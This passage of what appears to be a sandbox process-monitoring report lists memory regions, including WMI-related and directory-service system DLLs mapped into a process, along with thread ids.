monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 5355
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 5356
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 5357
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 5358
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 5359
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 5360
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 5361
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 5476
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 5477
start_va = 0x450000
end_va = 0x454fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Thread:
id = 258
os_tid = 0x528
Thread:
id = 259
os_tid = 0x45c
Thread:
id = 260
os_tid = 0x448
Thread:
id = 261
os_tid = 0x568
Thread:
id = 262
os_tid = 0x510